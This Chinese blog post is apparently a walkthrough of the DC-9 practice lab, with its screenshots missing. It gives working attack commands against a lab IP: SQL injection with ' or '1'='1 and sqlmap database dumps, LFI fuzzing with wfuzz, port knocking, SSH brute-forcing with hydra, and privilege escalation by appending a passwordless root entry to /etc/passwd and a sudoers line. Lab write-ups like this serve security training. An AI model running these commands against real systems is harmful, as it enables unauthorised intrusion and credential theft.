DC-9
DC-9
基础信息收集
NMAP Result:
Nikto Result:
看到只开发了HTTP的80端口,访问。
Search引起了我的注意:
果断抓包送Burp测试看看,请求如图:
加个引号测试一下注入,无果,直接试试' or '1'='1,爆出了所有用户:
确定存在sql注入。
SQL注入
跑sqlmap:
1 | sqlmap -u http://192.168.145.142/results.php --data "search=" |
爆数据库:
1 | sqlmap -u http://192.168.145.142/results.php --data "search=" --dbs |
爆users库:
1 | sqlmap -u http://192.168.145.142/results.php --data "search=" -D users --dump |
爆Staff库的表:
1 | sqlmap -u http://192.168.145.142/results.php --data "search=" -D Staff --tables |
爆Users表:
没crack出密码出来,一会去网站看看。
爆StaffDetails表:
1 | sqlmap -u http://192.168.145.142/results.php --data "search=" -D Staff -T StaffDetails --dump |
没啥有用信息。
爆admin密码
emmm,CMD5要付费,23333,我做个题还要交钱吗,永不为奴!
推荐个网站:https://hashes.com/en/decrypt/hash
拿到密码:
LFI
登录网站发现底部:
象征性测试一下:
emmm,难不成是相对路径,再测试一波:
相对路径伪协议好像就无法搞了,FUZZ走一波看看敏感配置文件好了:
1 | wfuzz -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u http://192.168.145.142/manage.php?file=../../../../FUZZ -b PHPSESSID=q56ip7f0nf6cnrrtqhg1rpi5k3 --hh 1341 |
读一下:
过滤地看一下:
配置了OpenSSH,但是nmap没有扫描到。
Knockd
说明被藏起来了,扫一下knockd的配置文件:
确实是被隐藏起来了,敲门顺序是7469,8475,9842
nmap敲门并扫描看看:
1 | for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.145.142; done |
SSH
利用之前爆出的账号和密码,hydra爆破:
1 | hydra -L user -P pwd ssh://192.168.145.142 > ssh_services |
挨个登录找找有用信息,最后在用户janitor用户的目录下找到了一些密码:
利用该密码再爆破一次:
1 | hydra -L user -P newpwd ssh://192.168.145.142 >> ssh_services |
发现一个新用户,提权有望!
此前已经判断过开始三个用户的提权可能性
提权
登录查看sudo:
发现这个程序:
应该是一个Python的脚本,找找在哪儿:
看一下内容:
追加内容,害,还是老套路提权。
在/etc/passwd加一个用户就好了。
1 | echo "escape::0:0:::/bin/bash" > /tmp/escape |
添加成功,正当我想切换到用户escape的时候:
。。。Google了大半天不知道啥问题,算了直接加Sudoers权限吧。。。
1 | echo "fredf ALL=(ALL:ALL) ALL" > /tmp/escape2 |
后续测试中,似乎只有使用useradd添加的用户才能切换,不知道是什么情况
- 本文标题:DC-9
- 本文作者:青 叶
- 创建时间:2021-04-03 15:07:03
- 本文链接:p/26168/
- 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!